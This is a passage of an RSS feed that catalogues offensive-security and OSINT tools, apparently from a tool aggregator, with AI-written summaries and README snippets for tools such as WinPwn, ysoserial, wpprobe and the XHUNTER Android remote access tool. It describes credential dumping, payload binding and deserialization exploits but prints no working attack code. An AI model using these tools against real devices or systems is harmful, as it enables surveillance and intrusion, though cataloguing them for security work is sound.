 ** Channel : @UltraSecurity **
 ** Developers : Ultra Security Team **
 ** Thank's : .::Shayan::. **
 ==================================================================== 
 
 [$] Choose one of the options below 

 [1] Information Gathering

 [2] CMS Detection

 [3] Developer :)

 [4] Exit . . .

 ┌─[WEBKILLER~@HOME]
 └──╼ $ 


&lt;/pre&gt;
&lt;h2 id="operating-systems-tested"&gt;Operating Systems Tested&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Kali Linux 2020.1&lt;/li&gt;
&lt;li&gt;Windows 10&lt;/li&gt;
&lt;li&gt;Ubuntu 19.10&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="install"&gt;Install&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git clone https://github.com/ultrasecurity/webkiller.git
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd webkiller
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 install -r requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python3 webkiller.py 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="screenshot"&gt;ScreenShot&lt;/h2&gt;
&lt;p&gt;&lt;img src="http://uupload.ir/files/otmb_webkiller.jpg" alt="webkiller"&gt;&lt;/p&gt;</description></item><item><title>wesng</title><link>https://rainmana.github.io/hackyfeed/tools/bitsadmin-wesng/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bitsadmin-wesng/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Windows Exploit Suggester - Next Generation (WES-NG) is a vulnerability assessment tool for Windows operating systems from XP to 11, leveraging the output of the &lt;code&gt;systeminfo&lt;/code&gt; utility to identify potential vulnerabilities and applicable exploits. The tool supports multiple methods for patch assessment and incorporates a database updated from various security sources, including the Microsoft Security Update API. Notable features include the ability to validate missing patches against Microsoft&amp;rsquo;s Update Catalog and a collector for maintaining an up-to-date vulnerability database.&lt;/p&gt;</description></item><item><title>WhatsMyName</title><link>https://rainmana.github.io/hackyfeed/tools/webbreacher-whatsmyname/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/webbreacher-whatsmyname/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WhatsMyName is an open-source tool designed for OSINT practitioners to identify whether specific usernames are registered on various websites, using a central JSON data file of accessible sites that adhere to specific URL format criteria. The project has shifted its focus from direct username checking scripts to maintaining and enhancing its dataset, which supports various third-party tools and extensions for username validation across diverse platforms. Notable features include community-driven contributions, compatibility with multiple user-checking tools, and the ability to integrate with user-friendly web interfaces and applications.&lt;/p&gt;</description></item><item><title>Windows-Local-Privilege-Escalation-Cookbook</title><link>https://rainmana.github.io/hackyfeed/tools/nickvourd-windows-local-privilege-escalation-cookbook/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nickvourd-windows-local-privilege-escalation-cookbook/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Windows Local Privilege Escalation Cookbook is designed to educate users on local privilege escalation techniques within Windows environments, focusing on exploiting misconfiguration vulnerabilities. It provides structured guidance, including sections on description, lab setup, enumeration, exploitation, and mitigation for various vulnerabilities, while also emphasizing ethical usage and the need for responsible application of the techniques outlined. Notably, it excludes evasion tactics and includes a PowerShell script for disabling Windows Defender under specific conditions.&lt;/p&gt;</description></item><item><title>WinPwn</title><link>https://rainmana.github.io/hackyfeed/tools/s3cur3th1ssh1t-winpwn/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/s3cur3th1ssh1t-winpwn/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WinPwn is a comprehensive PowerShell-based tool designed for internal penetration testing, emphasizing automation and proxy support for reconnaissance and exploitation tasks. Its notable features include modules for session management, credential dumping, local and domain reconnaissance, and privilege escalation checks, alongside the ability to operate offline and integrate well-known offensive security scripts. The tool streamlines the penetration testing process with an interactive menu for selecting various attack methods and extensive built-in reconnaissance capabilities.&lt;/p&gt;</description></item><item><title>wordlists</title><link>https://rainmana.github.io/hackyfeed/tools/trickest-wordlists/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trickest-wordlists/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Trickest Wordlists repository provides a collection of real-world information security wordlists, updated regularly for various technologies including popular CMS platforms and cloud assets. Its primary use case is to assist security professionals in penetration testing and vulnerability assessments by generating wordlists for directory bruteforcing and subdomain enumeration. Notable features include distinct wordlist formats for different scenarios, such as base and all levels for technology-based lists, as well as comprehensive data extracted from top websites&amp;rsquo; &lt;code&gt;robots.txt&lt;/code&gt; files and extensive subdomain inventories from public bug bounty programs.&lt;/p&gt;</description></item><item><title>wpprobe</title><link>https://rainmana.github.io/hackyfeed/tools/chocapikk-wpprobe/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/chocapikk-wpprobe/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WPProbe is a rapid scanning tool designed to detect installed WordPress plugins and themes through REST API enumeration and HTML discovery, mapping them to known vulnerabilities. It supports multiple scanning modes, including stealthy, brute-force, and hybrid methods, allowing detection of over 5,000 plugins without brute-force and many more with it. The tool fetches an updated vulnerability database automatically, eliminating the need for an API key by default, while still allowing for custom configurations and output formats.&lt;/p&gt;</description></item><item><title>X-osint</title><link>https://rainmana.github.io/hackyfeed/tools/termuxhackz-x-osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/termuxhackz-x-osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; X-osint is an open-source OSINT tool designed for gathering credible information related to phone numbers, email addresses, and IP addresses, with additional features planned for future updates. Notably, it includes functionalities for IP and email information gathering, metadata extraction from images and files, subdomain enumeration, and DNS lookups, among others. The tool is built using Python and Bash and is maintained actively, ensuring regular updates and enhancements.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="x-osint"&gt;X-osint&lt;/h1&gt;
&lt;p&gt;This is an osint tool which gathers useful and yet credible valid information about a phone number, user&amp;rsquo;s email address and ip address and more to come in future updates
&lt;img src="images/x-osint_banner_white_texts.png" float="center"&gt;&lt;/p&gt;</description></item><item><title>xeuledoc</title><link>https://rainmana.github.io/hackyfeed/tools/malfrats-xeuledoc/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/malfrats-xeuledoc/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; xeuledoc is a Python tool designed for retrieving metadata and information from various types of public Google documents, including Google Drive files, Google Docs, Sheets, Slides, Drawings, My Maps, Apps Script, and Jamboard. Notable features include ease of installation via PyPI and GitHub, and the ability to handle multiple Google document formats, making it a versatile solution for information extraction from Google’s platform.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="xeuledoc"&gt;xeuledoc&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/pypi/v/xeuledoc" alt="PyPI"&gt; &lt;img src="https://static.pepy.tech/badge/xeuledoc" alt="PyPI - Downloads"&gt; &lt;img src="https://img.shields.io/pypi/l/xeuledoc" alt="PyPI - License"&gt;&lt;/p&gt;</description></item><item><title>xhunter</title><link>https://rainmana.github.io/hackyfeed/tools/anirudhmalik-xhunter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/anirudhmalik-xhunter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; XHUNTER is an advanced Android Remote Access Tool (RAT) designed for penetration testing and ethical hacking purposes. It simplifies the connection process between the attacker and victim by eliminating the need for complex port forwarding, offering a user-friendly interface for controlling a victim&amp;rsquo;s Android device. Notable features include the capability to build and bind payloads to legitimate applications and an intuitive setup process for immediate usability.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div id="top"&gt;&lt;/div&gt;
&lt;!-- PROJECT SHIELDS --&gt;
&lt;p&gt;&lt;a href="https://github.com/anirudhmalik/xhunter/graphs/contributors"&gt;&lt;img src="https://img.shields.io/github/contributors/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Contributors"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/network/members"&gt;&lt;img src="https://img.shields.io/github/forks/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Forks"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Stargazers"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/issues"&gt;&lt;img src="https://img.shields.io/github/issues/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Issues"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/blob/master/LICENSE.md"&gt;&lt;img src="https://img.shields.io/github/license/anirudhmalik/xhunter.svg?style=for-the-badge" alt="MIT License"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/commits/master"&gt;&lt;img src="https://img.shields.io/github/last-commit/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Last Commit"&gt;&lt;/a&gt;
&lt;a href="https://github.com/anirudhmalik/xhunter/releases"&gt;&lt;img src="https://img.shields.io/github/repo-size/anirudhmalik/xhunter.svg?style=for-the-badge" alt="Repo Size"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>yarGen</title><link>https://rainmana.github.io/hackyfeed/tools/neo23x0-yargen/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/neo23x0-yargen/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; yarGen is a YARA rule generator designed to create rules based on strings extracted from malware files while filtering out strings common to goodware, thereby enhancing detection capabilities. Notable features include the integration of a naive-Bayes classifier for improved string selection, opcode processing from PE files, and support for additional conditions using the &lt;code&gt;pe&lt;/code&gt; module. The tool also allows for output tailored for AI processing by appending instructions to generated rules when using the &lt;code&gt;--ai&lt;/code&gt; flag.&lt;/p&gt;</description></item><item><title>ysoserial</title><link>https://rainmana.github.io/hackyfeed/tools/frohoff-ysoserial/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/frohoff-ysoserial/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ysoserial is a proof-of-concept tool designed to generate payloads for exploiting vulnerabilities related to unsafe Java object deserialization. It includes a collection of property-oriented programming &amp;ldquo;gadget chains&amp;rdquo; for various Java libraries, allowing users to execute arbitrary commands on an application host when deserialization occurs under vulnerable conditions. Notable features include support for multiple payload types and compatibility with various Java libraries, making it a versatile tool for security researchers focusing on Java application vulnerabilities.&lt;/p&gt;</description></item><item><title>Zero-attacker</title><link>https://rainmana.github.io/hackyfeed/tools/asjadoooo-zero-attacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/asjadoooo-zero-attacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Zero Attacker is a suite of ethical hacking tools designed for penetration testing and includes both free and paid advanced tools. It offers a user-friendly interface for quick setup and execution via Python, with additional features available upon request through their Discord server. The tool emphasizes community engagement and support, aiming to facilitate a comprehensive hacking experience for users.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h3 id="zero-attacker"&gt;Zero Attacker&lt;/h3&gt;
&lt;p&gt;launching new version beta testing is here add me on discord .asjad asap&lt;/p&gt;</description></item></channel></rss>